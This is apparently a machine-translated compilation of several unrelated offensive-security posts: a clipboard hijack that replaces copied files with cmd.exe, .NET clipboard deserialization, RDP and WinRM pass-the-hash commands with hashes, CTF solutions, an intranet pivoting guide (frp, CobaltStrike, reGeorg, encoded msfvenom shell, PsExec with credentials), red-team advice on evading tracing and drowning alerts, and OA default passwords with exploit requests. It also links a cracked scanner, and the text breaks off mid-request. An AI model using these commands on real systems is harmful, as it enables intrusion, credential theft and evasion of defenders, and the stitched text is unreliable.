CopyFileToClipboard(char szFileName[]) { UINT uDropEffect; HGLOBAL hGblEffect; LPDWORD lpdDropEffect; DROPFILES stDrop; HGLOBAL hGblFiles; LPSTR lpData; uDropEffect=RegisterClipboardFormat('Preferred DropEffect'); hGblEffect=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD)); lpdDropEffect=(LPDWORD)GlobalLock(hGblEffect); *lpdDropEffect=DROPEFFECT_COPY;//Copy; Use DROPEFFECT_MOVE for scraping and pasting GlobalUnlock(hGblEffect); stDrop.pFiles=sizeof(DROPFILES); stDrop.pt.x=0; stDrop.pt.y=0; stDrop.fNC=FALSE; stDrop.fWide=FALSE; hGblFiles=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DROPFILES) + strlen(szFileName) + 2); lpData=(LPSTR)GlobalLock(hGblFiles); memcpy(lpData, stDrop, sizeof(DROPFILES)); strcpy(lpData + sizeof(DROPFILES), szFileName); GlobalUnlock(hGblFiles); OpenClipboard(NULL); EmptyClipboard(); SetClipboardData(CF_HDROP, hGblFiles); SetClipboardData(uDropEffect, hGblEffect); CloseClipboard(); return 1; } In this way, after the administrator copies any file from the server and downloads it to the machine, the file will be replaced with cmd.exe .NET Deserialization See an idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/`. (I never expected this way to play) Utilize `https://github.com/pwntester/ysoserial.net` The utilization process is to replace it with serialized code when pasting the clipboard. Deserialization operation will be triggered when some applications are pasted. Moreover, if the target .NET application is run with higher permissions, it can also be used as permission promotion. (The current user does not have a UAC account password, but the administrator has opened a .NET application before UAC.) ysoserial.exe -p Clipboard -c calc -F System.String Tested program: PowerShell ISE VS Drawing tools Any WPF application that utilizes TextBox, PasswordBox, or RichTextBox will also be affected. RDP pth User hash login on Windows Mstsc Server needs to be enabled Restricted Admin mode, which is enabled by default in Windows 8.1 Windows Server 2012 R2. At the same time, if Win 7 and Windows Server 2008 R are installed, 2871997 and 2973351 patches are also supported; Client needs to support Restricted Admin mode Turn on Restricted Admin mode REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 000000000 /f When enabled, use: mstsc.exe /restrictedadmin Login without password, the current user's hash will be used for verification Mimikatz mimikatz.exe privilege:debug sekurlsa:pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b '/run:mstsc.exe /restrictedadmin'

1.pyc Use pyc to decompile online to get the python source code: #!/usr/bin/env python # visit https://tool.lu/pyc/for more information # Version: Python 3.8 import random def encrypt_file(file_path): random.seed(114514) # WARNING: Decompyle incomplete file_path='./flag' encrypt_file(file_path) Then use AI analysis to get its corresponding decryption script import random import os def decrypt_data(encrypted_data): random.seed(114514) decrypted_data=bytearray() for byte in encrypted_data: key=random.randint(0, 128) decrypted_data.append(byte ^ key) return decrypted_data def read_file(file_path, mode='rb'): with open(file_path, mode) as file: return file.read() def write_file(file_path, data, mode='wb'): with open(file_path, mode) as file: file.write(data) def decrypt_file(encrypted_file_path, output_file_path): encrypted_data=read_file(encrypted_file_path) decrypted_data=decrypt_data(encrypted_data) write_file(output_file_path, decrypted_data) if __name__=='__main__': encrypted_file_path='flag.enc' output_file_path='flag_decrypted.txt' decrypt_file(encrypted_file_path, output_file_path) #flag{U_R_g00d_at_do1n_pyc} 2.MWatch Tip: When a data security researcher analyzes the data collected by smart devices in real time, he detects that a device user has had a high value. Please help analyze the highest value. flag{md5(data acquisition device name data reception device name value)} Heart Rate appears many times, and you should look for this based on the description of the question. Only check the Heart Rate related flag{md5(Mi Smart Band 5_Redmi K40_128)} flag{453d8feda5adb6e7b4d54f71a9ce9e14} 3.BabyRSA Tip: A certain employee has an initial value that generates prime numbers, and he ran this algorithm for a long time. The program accidentally terminal and accidentally deleted the initial value. Can the plain text be restored? Source code: #task.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from secret import flag,init from Crypto.Util.number import * from sage.all import * from gmpy2 import iroot m=bytes_to_long(flag.encode()) r=getPrime(128) p=init # for i in range(r-1): # p +=next_prime(init) # assert iroot(p,3)[1]==1 q=getPrime(12) # N=p*q*r N=r**4*q e=getPrime(17) c=pow(m,e,N) print(f'r={r}') print(f'e={e}') print(f'c={c}') # r=287040188443069778047400125757341514899 # e=96001 # c=7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625 Blast the 12-bit prime number to get q, and then decrypt it from Crypto.Util.number import long_to_bytes, inverse r=287040188443069778047400125757341514899 e=96001 c=7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625 # Assuming the modulus for the exponentiation should indeed be r**4 n=r**4 # Compute the modular inverse of e mod φ(n), where φ(n) could be a function of r, like (r-1)*(r**3) # We need the correct value of φ(n) for the RSA decryption formula m=c^d mod n, where d=e^(-1) mod φ(n) # Here, assuming φ(n)=r^4 - r^3 as a simplification, you might need to adjust this based on actual RSA setup phi_n=r**4 - r**3 d=inverse(e, phi_n) # Decrypt message m=pow(c, d, n) # Convert number to bytes message=long_to_bytes(m) print(message) #flag{3b0ce326141ea4f6b5bf2f37efbd1b42} 4.Backpack Backpack encryption, using the BKZ algorithm to solve a set of bases #!/usr/bin/env python3 # -*- coding: utf-8 -*- from sage.all import * from secret import flag from Crypto.Util.number import * from math import log2 class Knapsack: def __init__(self,n,m): self.M=[] self.n=n self.m=self.pre(m) self.A=0 self.B=0 def pre(self,m): tmp_m=bin(m)[2:] t=[] for tmp in tmp_m: t.append(int(tmp)) Return t def get_M(self): seq=[randint(2**34,2**35) for _ in range(self.n)] self.M=seq def calc_density(self): t=log2(max(self.M)) d=self.n/t print(d) def enc(self): self.get_M() self.calc_density() C=0 for t in range(len(self.m)): C +=self.m[t] * self.M[t] print(f'C={C}') print(f'M={self.M}') if __name__=='__main__': m=bytes_to_long(flag.encode()) n=m.bit_length() k=Knapsack(n,m) k.enc() # C=231282844744 # M=[27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920] Execute in sagemath: from Crypto.Util.number import long_to_bytes C=231282844744 M=[27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920] L=block_matrix([[1, matrix(ZZ, M).T], [0, C]]).LLL() for row in L: if row[-1]==0 and len(set(row[:-1]))==1: # Assuming all elements in the row, except the last one, are the same ans=[abs(i) for i in row[:-1]] ans=int(''.join(map(str, ans)), 2) print(long_to_bytes(ans)) 5.Targeted Data Collection import openpyxl import requests import time from urllib.parse import urlencode burp0_url='http://121.40.65.125:23328/submit' def separate_name_and_id(input_file, output_file): wb=openpyxl.load_workbook(input_file) ws=wb.active for row in ws.iter_rows(min_row=1, max_col=1, max_row=ws.max_row, values_only=True): if row[0]: name, id_number=row[0].split('----') #Extract name and identity card print(name, id_number) age=2024-int(id_number[6:10]) if(int(id_number[10:12])4): age -=1 sexx=u'male' burp0_json={'address': 'asd', 'age': str(age), 'ethnicity': 'as', 'experience': '1', 'idcard': id_number, 'name': 'a', 'phonenumber': '12312331233', 'position': 'as', 'sex': sexx} sexx2=u'female' burp0_json1={'address': 'asd', 'age': str(age), 'ethnicity': 'as', 'experience': '1', 'idcard': id_number, 'name': 'a', 'phonenumber': '12312331233', 'position': 'as', 'sex': sexx2} try: r0=requests.post(burp0_url, json=burp0_json) r1=requests.post(burp0_url, json=burp0_json1) print(r0.request.body) print(r0.text,r1.text) #time.sleep(0.5) except requests.exceptions: print('err') #time.sleep(2) #ws.append([name.strip(), id_number.strip()]) #wb.save(output_file) wb.close() if __name__=='__main__': input_file='data1.xlsx' output_file='separated_data.xlsx' #No use, it's discarded separate_name_and_id(input_file, output_file) 6.weather Review bundle.js Take parameters to access 7.mysql cleanup Tip: According to the requirements, to completely delete some user data from the database, please connect to the provided mysql container and delete all ctf tables, the user ids are 5142, 2123, 1169, and 8623. It is required to clean up these users thoroughly, and the residual data cannot be found in the server [, and other user data cannot be changed. When the operation is successful, the system will enter flag data in the ctf.flag table. (mysql ctf user password pswd@123) DELETE FROM ShoppingCart WHERE user_id in ('5142','2123','1169','8623'); DELETE FROM TransactionHistory WHERE user_id in ('5142','2123','1169','8623'); DELETE FROM UserLog WHERE user_id in ('5142','2123','1169','8623'); DELETE FROM Wallet WHERE user_id in ('5142','2123','1169','8623'); DELETE FROM User WHERE id in ('5142','2123','1169','8623'); Rebuild the table and clear the remaining data after deletion alter table User engine=innodb; alter table UserLog engine=innodb; alter table TransactionHistory engine=innodb; alter table ShoppingCart engine=innodb; alter table Orders engine=innodb; 8.Phantom Square There are only eight results for the third-level magic square, just try it a few more times import hashlib import random import string # Define the character set as alphanumeric characters charset=string.ascii_letters + string.digits while True: # Generate a random 4-character string from the charset rand_str=''.join(random.choice(charset) for _ in range(4)) + 'CyhQp8lsgzYjTNUD' # Calculate the SHA-256 hash of the string hash_output=hashlib.sha256(rand_str.encode()).hexdigest() # Check if the hash matches the target hash if hash_output=='11f8af166cc28e24b4646cc300436f4d4bf8e11b2327379331a3eca2d5fc7c0c': print(rand_str[:4]) # Print the first 4 characters if a match is found break ''' [2, 7, 6, 9, 5, 1, 4, 3, 8] [2, 9, 4, 7, 5, 3, 6, 1, 8] [4, 3, 8, 9, 5, 1, 2, 7, 6] [4, 9, 2, 3, 5, 7, 8, 1, 6] [6, 1, 8, 7, 5, 3, 2, 9, 4] [6, 7, 2, 1, 5, 9, 8, 3, 4] [8, 1, 6, 3, 5, 7, 4, 9, 2] [8, 3, 4, 1, 5, 9, 6, 7, 2] 4 3 8 9 5 1 2 7 6 '''

Preface When intranet penetration, a WebShell or CobaltStrike, Metasploit will be launched, etc. is just the beginning, and it is more about moving the intranet horizontally, expanding the results, and hitting the core area. However, the prerequisite for post-infiltration is to build an "exclusive channel" to the intranet in order to further attack. However, in actual combat, the use methods are different due to different network environments. The following is a self-summary of the mind map of "The way of intranet penetration in actual combat": Target outbound (socks proxy) This is the network environment that you are most willing to encounter in actual combat. The target machine can access the Internet normally and can directly hang the socks agent or CobaltStrike on the target machine to open up the target's intranet channel. Frp (socks5) Frp server configuration file: 1 | [common] 2 | bind_port=8080Frp client configuration file: 1 | [common] 2 | server_addr=xx.xx.xx.xx 3 | server_port=8080 4 | #Service ports use common web ports 5 | 6 | [socks5] 7 | type=tcp 8 | remote_port=8088 9 | plugin=socks5 10 | use_encryption=true 11 | use_compression=true 12 | #socks5 password 13 | #plugin_user=SuperMan 14 | #plugin_passwd=XpO2McWe6nj3 The two functions of encryption and compression are added here, which are not enabled by default. According to the author's introduction, the compression algorithm uses snappy. use_encryption=true Enable encryption [Encrypted transmission of communication content, effectively preventing traffic from being intercepted] use_compression=true Enable compression [Convey the transmission content to effectively reduce the transmitted network traffic and speed up the traffic forwarding speed, but will consume some additional CPU resources] use_encryption=true , use_compression=true must be placed under the relevant protocol. After the frp client and configuration files are transmitted to the target machine, the program name and configuration files are modified and placed in the system-related folders to make it hidden. Comparison of encryption compression This is the FRP client configuration file that does not use encryption and compression functions. The metasploit hangs the socks proxy is used to scan the data packets transmitted by ms17_010, which can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions. After using encryption and compression functions, although the attack source address will also be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet. CobaltStrike (socks4a) to the Beacon of the controlled target machine to enable the socks agent. 1 | beacon socks 1024 #Port is set according to the actual situation of VPS View Proxy Pivots in the menu bar, the copy proxy is connected to Metasploit, or directly hang socks4a in related security tools. will not be available for online machines. This is a link link. As long as the main link (network Beacon) is disconnected, all of them will be disconnected! SMB Beacon official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon gets the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden. Create an SMB Listener (host and port can be ignored), pay attention to the Listener selection, and select the host-derived session that can be reached by route in the session. After successful operation, you can see the character ∞∞, which is the connection state of the derived SMB Beacon. can be disconnected with link host link or unlink host on the main Beacon. 1 | beacon link 192.168.144.155 2 | beacon unlink 192.168.144.155 Link Listener Creates Listener on the online host. Export the executable file or dll corresponding to this type of Listener. Select the Listener you just created. Upload the paidload just generated to the currently online target machine, and use the PsExec.exe tool here. (CobalStrike itself is not powerful enough) Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and go online. 1 | beacon shell C:WINDOWSTempPsExec.exe -accepteula \192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:WINDOWSTempbeacon.exe 1 | beacon shell netstat -ano |findstr 4444 SSH Login1 | beacon ssh 192.168.144.174:22 root admin 2 | beacon ssh 192.168.144.203:22 root admin Check the network connection status in the Linux target machine, which is actually a connection established with the previously launched Windows host. The target does not go out of the network (http proxy) There may be firewalls, network gates, etc. in the target machine network, which only allows http one-way outflow and cannot access the Internet normally. The above socks method is not feasible, and it can only be used to penetrate using http proxy. reGeorg (socks5)1 | python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080 uses metasploit to hang reGeorg socks proxy to scan the data packets transmitted by ms17_010, which can clearly identify attack behavior. Neo-reGeorg (encrypted)1 | python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx After using Neo-reGeorg, the packet has been transmitted encrypted. Ice Scorpion (Open socks5) Ice Scorpion's packet transmission is encrypted and also has the socks proxy function, but there is packet loss during the transmission process. Here we also use metasploit to detect the ms17_010 vulnerability, but the result shows that it does not exist. When no proxy detection is set, the actual vulnerability exists. Although the proxy scanning method of Ice Scorpion is not as accurate as reGeorg, port detection of small threads is feasible, such as auxiliary/scanner/portscan/tcp. Accuracy is more determined by the number of packets in some detection or other way of transmission. reduh (Single-port Forwarding) When the service version of the target server middleware and other services is low, reGeorg or Ice Scorpion Horse cannot resolve normally, you need to use other http proxy scripts. This is the environment encountered in a practical battle: Take reduh as an example here. Although only forwarding the specified port (graphical connection operation is not applicable), you can first use msfvenom to generate a forward shell payload, then combine reduh single-port forwarding to launch metasploit, and finally use the socks4a module to open the proxy. Let’s go through the specific process below: 1 | sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe 2 | 3 | --platform platform Specify the target platform for payload 4 | -e, --encoder encoder Specifies the encoder to use 5 | -i, --iterations count Specifies the number of encoding times of payload Upload the payload to the target server and execute it. metasploit is the address and port after listening for forwarding. 1 | sudo msfconsole -q 2 | msf5 use exploit/multi/handler 3 | msf5 exploit(multi/handler) set payload windows/shell_bind_tcp 4 | msf5 exploit(multi/handler) set rhost 127.0.0.1 5 | msf5 exploit(multi/handler) set lport 5353 6 | msf5 exploit(multi/handler) run -j After reDuhServer is transmitted to the target machine, use reDuhClient to connect, and then the rebound port is turned locally. 1 | java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspx 2 | 3 | telnet 127.0.0.1 1010 4 | [createTunnel]5353:127.0.0.1:53 can penetrate in metasploit, or turn on a socks4a and mount other security tools to continue penetration. 1 | msf5 exploit(multi/handler) use auxiliary/server/socks4a 2 | msf5 auxiliary(server/socks4a) set srvport 10080 3 | msf5 auxiliary(server/socks4a) run -j Note why payload requires shell instead of meterpreter. Meterpreter is a high-level payload that occupies a large number of data packets during transmission. This single-port forwarding is not very stable at all. Meterpreter will make the "small water pipe" more unstable! Isolated Network (Multi-level Agent) During intranet penetration, an isolated network will be encountered, which is more logically isolated. The breakthrough method is to obtain the permissions of the route-accessible springboard machine (multiple network cards, operation and maintenance machines, etc.) and establish a first-level second-level agent and a third-level agent. FRP has now obtained the permissions of a dual network card intranet server, and can use FRP to establish channels. This server is both a server and a client. After the proxifier is established with FRP, add two proxyings in combination with the proxifier: external network socks and intranet socks, and then create a proxy chain. (Note the proxy order) Set proxy rules and select the corresponding proxy. The second layer agent was successful, and the intranet isolation machine 445 detection was opened. Proxychains command line proxy artifact proxychains, sets the second-layer proxy and socks password. (Note the proxy order)

Recently, I returned to the blue team because I understand it. I occasionally played a guest role in connecting with customers and wrote some summary based on the characteristics of each device I came into contact with. From the vision of the Red Team, how to prevent the source from being traced. ---8sec.cc 1. Honeypot system Browser usage note Single Isolated Browser Try to use browsers different from common browsers during penetration, such as: Chrome is commonly used, and use firefox for penetration. Use traceless mode firefox and Chrome have traceless mode. If you don’t know the target assets, try to turn on traceless mode for testing. The above two methods can mainly avoid using Jsonp Callback, XSS and other vulnerabilities in honeypots to obtain the ID and information of the Red Team personnel. However, the fingerprintjs library used in honeypots can determine whether the source visitors are the same person based on the specific identification of different IPs and different browsers, so using traceless mode and different browsers alone will also lead to the recognition of honeypots. Anti-honey pot plugin bypass Honeypot AntiHoneypot - A Chrome extension that intercepts honeypot XSSI Function Intercept the XSSI request initiated in the page, block suspicious XSSI (Jsonp Callback, XSS, etc.) through feature identification, analyze and grab the inherent features of honeypots, identify the honeypot and intercept all requests to determine whether the fingerprintjs library exists and prompt, determine whether there are other related calls to determine whether there is a persistent identity. The relevant calls to determine whether the clipboard paste has been valued (to be further verified) clear all browser data functions of the current website (including all cached and stored) with one click to determine whether FileSystem is operated in the page (evercookies can be written here) 2. Prevent countermeasures Server Springboard Machine According to the traceability of information obtained by various companies, some of the reasons for eliminating honeypots is that VPS is beaten, and routinely being taken down may be that the Red Team personnel lack understanding of Linux/Windows operation and maintenance. For example, using Docker to build a vulnerable environment is escaped. Use a one-click environment to build default program default passwords (phpmyadmin, BT/pma vulnerabilities, information leakage vulnerabilities) nmap's interactive execution command find suid bit escalation, etc. Server installation application/management There must be targeted restrictions for installing different applications, iptables and remote login limit login sources, and the number of bursts. It is recommended to install and use software such as CS and do not give 777 permissions. This time there are cases of counter-promotion of rights. Virtual machine running software In the widely circulated counter-cases, there was a situation where the bundled horse/white and black use of the Blue Team VPN installation package caused the Red Team personnel to go online. Therefore, if you want to download/install targets such as finance (IE control), VPN, etc. try to operate in the virtual machine as much as possible, roll back the image after each different work/project, and make a backup when the virtual machine network agent configuration is completed. 3. Information hiding Hidden mobile phone number Alibaba Small Account has now banned registration and application, and it is estimated that it will be closed in a while. During the regular penetration, you can choose to purchase SMS cards, use a code-receiving platform, use an Internet phone to make calls or buy a real-name card. It is best to achieve physical isolation from daily life. Alipay Alipay has had a problem before. If you enable the online merchant bank, you can directly see the name of the transfer object with three characters. If it is a two characters, you can directly use the Alipay transfer function to guess the name based on other information. WeChat WeChat is also some places where ids are leaked. Turn off mobile phone search, add friends in WeChat group, only enable QR code to add friends, and only allow viewing of circles of friends within 3 days. Ask your friends to make a fake name as much as possible. For example: Zhang xx Li xx QQ The same as WeChat, close the space non-friend access, access date restrictions, photo restrictions, photo wall restrictions, and game display. Ask your friends to make a fake name as much as possible. For example: Zhang xx Li xx, I had this problem before with QQ, and used the notes between friends to leak my real name. https://zhuanlan.zhihu.com/p/95525409 qq Get real names of common friends https://github.com/anntsmart/QQ Although it can no longer be used, it does not mean that no relevant interfaces have been leaked. For example, if you log in to qq in the previous t.qq.com, you can log in directly without any security verification and obtain the QQ sealey Network ID Hiding Try to use some regular characters for common network IDs, such as: Brother Pants. This kind of news figure. The real name is hidden/misleading Ask your friend to make a fake name as much as possible. For example: Zhang xx Li xx, I had this problem before with QQ, and used the notes between friends to leak my real name. Because there will only be more and more information in the social work library, spending money to hide is purely an ostrich, so you can only hide your true information in various places, such as taking out/express using fake names + small accounts. Register identity information using information generated online or the source you know. 4. Network Hiding The network hiding needs to be emphasized, the differences between various proxy methods and what is suitable for use under what circumstances. SS/V2 Advantages Connection traffic is encrypted/obfuscated. If you use kcp, you can simulate WeChat video traffic. Disadvantages Because Socks5 is used, it can only proxy tcp traffic, icmp/udp cannot proxy, and it is easy to cause leakage due to client forwarding performance problems. VPN l2tp/pptp Advantages The traditional dedicated line proxy mode supports global proxy for various systems. The possibility of setting the key to be cracked is not high. The proxy can manually set the route to determine whether to access different addresses and go to different routes. You can set 0.0.0.0 to go to the full protocol of VPN. Simple to build openvpn/SoftEtherVPN Linux construction: https://github.com/hwdsl2/setup-ipsec-vpn/blob/master/README-zh.md Disadvantages When your network is unstable, the background will easily fall off directly, and the prompt is very short, so it is easy to run naked directly. It is recommended that only port 1723 is allowed to go out when the router is restricted, so that if it is disconnected, it will not be able to leave the network directly. Until you connect to vpn. All l2TP traffic in domestic networks can be decrypted. sslvpn Product List: Advantages The SSL protocol is mainly composed of the SSL recording protocol and the handshake protocol, which together provide authentication, encryption and tamper-proof functions for application access connections. Traffic can be encrypted. Disadvantages SSL vpn is limited to web browser applications and cannot be brought with some protocols. 5. Development and application hidden Develop and compile desktop users During the process of compiling the software, it is recommended to use administrator users to compile in the virtual machine. If the user name is leaked after the C#/C is compiled, the user name will be leaked, which will cause the ID information to be associated with platforms such as Weibu. PDB files: What every developer must know Github/Blog/WeChat Official Account Article Also, try to use another id from the Github/Blog/WX article to concentrate the search results or information that can be obtained in the false information constructed previously. Minimize the harm of features leaking personal information due to open codes. 6. Network device traffic confusion CS traffic confusion Use Malleable-C2 to obfuscate CS traffic, cooperate with the domain front to hide the backend IP, and replace the default CS certificate. Package padded bytes In viewing the traffic of some waf devices, it is learned that due to the functional limitations of waf, it will not record large packages for large packages. If you think the package will trigger rules, you can first fill in the body with some garbage characters. In this way, the real matching content cannot be seen on the hard waf, and it can also mislead the blue team to determine whether it is a business. (No full-flow device) Packet confusion low risk alarm In devices such as Aisa/Tianyan, if there is malicious content in your package, you can fill in some weak password features/plain text password login and other alarms to cover high-risk alarms, which will make the device monitor relax its vigilance and increase the time cost of subsequent traceability attack vulnerabilities. Host confusion When a confusing HOST is found during the test of waf, waf can detect the pre-NAT address. If you can understand some IP addresses of the target intranet, you can use HOST obfuscation to let the waf monitors determine that the pre-NAT address is the address of the intranet device. This can also guide the other party to respond to a secure server and increase the other party's time cost. Xff header confusion Usually xff header forgery is used to bypass web login IP restrictions, but in some complex intranet cases, security devices will also use xff headers to judge the attack's outermost attack IP and then block it. This can be replaced during the attack process, or add xff headers to confuse the other party's monitoring personnel by themselves. Or add xff before cdn, and then let cdn continuously superimpose xff. After viewing the addition of xff in waf, I successfully identified the attack ip as 127.0.0.1. Flow card In order to prevent traceability in some red team projects, it is best to use traffic cards for penetration as much as possible. Some traffic cards will jump to cities, which is very good. Including the cards I am using now, the IP judgment is basically China, and even the province will not come out. This is not to mention that the blue team is positioned based on the commonly used IP locations. Cobalt strike DNS features Usually the characteristics of DNS are regularly initiated to black domain names (if not enabled) In this case, it is quite difficult to determine the DNS characteristics, but if you want to check it, you can check DNS-type:1 on Tianyan Record A: The characteristics are more obvious after enabling DNS-txt: DNS-Type can find records of txt type, search for dns-type:16 in Tianyan. If there is a record of txt, it can be temporarily judged as a DNS horse of CS with a large number of xxx.16-digital.domain format. However, after the requests for the 3.14 version of CCS are encrypted, I haven't seen the encryption key yet. It hasn't been solved yet. The characteristic of executing commands is post.

WinRM implements port multiplexing This attack method requires an account and password. If you obtain hash, you can also use evil-winrm to achieve hash login. Service Introduction The full name of WinRM is Windows Remote Management, which is part of Microsoft's server hardware management function, and can manage local or remote servers. The WinRM service allows administrators to log in to the Windows operating system remotely and obtain an interactive command line shell similar to Telnet, while the underlying communication protocol uses HTTP. Backdoor Application In the windows2012 server, winrm is started by default, port 5985 is enabled, and the service needs to be manually enabled in the 2008 system. winrm quickconfig -q After startup, the firewall will also release the port Set to enable httplistener listening coexistence winrm set winrm/config/service @{EnableCompatibilityHttpListener='true'} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener='true'} //443 Modify the listening port to 80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port='80'} winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Port='443'} Local connection also requires turning on WinRM service and then setting up a trusted host. winrm quickconfig -q winrm set winrm/config/Client @{TrustedHosts='*'} winrs -r:http://172.16.142.151:5985 -u:administrator -p:admin123 'whoami' WinRM PTH Implement pth using evil-winrm under mac sudo gem install evil-winrm evil-winrm -i 172.16.142.151 -u administrator -H 8842

Break through from the most basic login box The login box is the character with the most occurrences of hw and is also the easiest to get out of holes. Here are some of your commonly used test methods Login blasting tips We have two solutions to the explosion of systems like this: Analyze the front-end encryption algorithm, write scripts to encrypt the password and fix the password to 123456 000000 The two methods of using common usernames as dictionary to blast the two methods have their own advantages and disadvantages. I prefer the second one, which will be more efficient in the game, and the analysis encryption algorithm is more suitable for the red team detection project. Use the blasted account password to log in to the background, and you can continue to find the background upload point See the image type here to restrict uploaded file format Add aspx file format type directly Successful getshell Modify the return packet parameters and enter the background Sometimes the website login status is judged based on the front-end, and at this time we can directly modify the return package to bypass it The front-end judgment login logic is determined based on the ret value of the return package. When the return value is 1, the login will be successfully logged in. Successfully entered the background Plugin detects common SQL injection and log4j vulnerabilities Recommended sql injection plug-in https://github.com/smxiazi/xia_sql The basic principle is to determine whether there is injection by sending multiple data packets based on the returned data length. In addition to passive scanning, we can also manually add single and double quotes to view the return package. If there is a similar error, there may be SQL injection. SQLmap shuttle log4j plugin recommended https://github.com/TheKingOfDuck/burpFakeIP Header header through burp plugin fuzz packet Successfully detected log4j vulnerability in login box But it should be noted that many dnslog platforms have been marked black by firewalls, so it is recommended to use ceye or build a dnslog platform yourself System default password + background 1day exploit As offensive and defensive competitions become more and more frequent, there are fewer and fewer front-end vulnerabilities that can be directly exploited on the public network, and most of them have been fixed by batch scanning, but we can use the system's default password and combine it with 1day for utilization. If the default password is present, admin/admin123 You can execute commands by scheduling tasks or deserializing them when entering the background. Many times when we encounter OA systems, we use OA vulnerability detection tools to scan for no loopholes and give up. In fact, there may be a problem with default passwords in this kind of OA system. Default Password System Administrator: system/system Group Administrator (A8-v5 Group Version) group-admin/123456 Unit Administrator (A8-V5 Enterprise Edition) admin1/admin123456 Audit Admin (all versions) audit-admin/seeyon123456 Sometimes you cannot log in when using your account password at the front desk. You can send the following data packet to get cookies. POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 71 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip UserAgentFrom=xxlogin_username=audit-adminlogin_password=seeyon123456 After obtaining the cookie, you can use the newer background hole of the patch for in-depth use. This time, use the copyfile background hole. However, after actual combat, I found that there were some pitfalls in this loophole, and an error was reported when writing to the webshell. POST /seeyon/ajax.do?method=ajaxActionmanagerName=portalCssManagerrnd=111 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 70 Host: 192.168.91.17 Connection: Keep-Alive User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321) Accept-Encoding: gzip,deflate arguments=%5B%22

0x01 Tools used The download address and installation method of the tool are placed after the introduction of each tool. If necessary, you can download it yourself. 1.AWVS Tools awvs introduction: Acunetix Web Vulnerability Scanner (AWVS) is a platform used to test and manage the security of web applications. It can automatically scan the Internet or local LAN for vulnerabilities and report vulnerabilities. Any Web site that is accessed and followed by HTTP/HTTPS rules can be scanned. Intranet, extrinsic network and web sites for customers, employees, vendors and other personnel for any small and medium-sized and large enterprises. AWS can review the security of web applications by checking for SQL injection attack vulnerabilities, XSS cross-site scripting vulnerabilities, etc. AWVS features and features: 1) Automatic client script analyzer, allowing security testing of Ajax and Web2.0 applications 2) The most advanced and in-depth SQL injection and cross-site scripting test in the industry 3) Advanced penetration testing tools such as HTPP Editor and HTTP Fuzzer 4) Visual macro recorder helps you easily test web forms and password-protected areas 5) Support pages containing CAPTHCA, single start instruction and Two Factor (two-factor) verification mechanism 6) Rich reporting features including VISA PCI compliance reporting 7) High-speed multithreaded scanner easily retrieves thousands of pages 8) Intelligent crawler detects web server type and application language 9) Acunetix retrieves and analyzes websites, including flash content, SOAP and AJAX 10) Port scans the web server and performs security checks on the network services running on the server 11) Can export website vulnerability files awvs tool installation tutorial address: https://blog.csdn.net/shandongjiushen/article/details/128377981 awvs tool cracked version download address (Baidu Netdisk) link: https://pan.baidu.com/s/1KayUhIShgUjozphx41CqsQ Extraction code: qbe0 2. Appscan Tools Appscan introduction: appscan is a dynamic application security testing tool designed specifically for security experts and testers. This can easily help users develop safer software and effectively avoid expensive vulnerabilities in the later stage of the development life cycle. The software has a powerful scanning engine built-in, which can automatically crawl target applications and test vulnerabilities, and the test results will be presented in a priority manner, which will enable operators to classify problems faster and be the first to discover the most critical vulnerabilities. At the same time, appscan will automatically provide users with clear and feasible repair suggestions, so that each discovered problem can be remediated more easily. Moreover, the software has a comprehensive security testing suite that supports testing web applications, web services, and mobile backends, and will use operation-based proprietary technology and tens of thousands of built-in scans to continuously check, so that this continuous testing and evaluation of risk checks on web services and applications can help prevent destructive security vulnerabilities. Introduction to Appscan functions: 1) Active and passive scanning Appscan supports active and passive scanning technology. In active scanning mode, it simulates the behavior of an attacker, sends malicious requests and 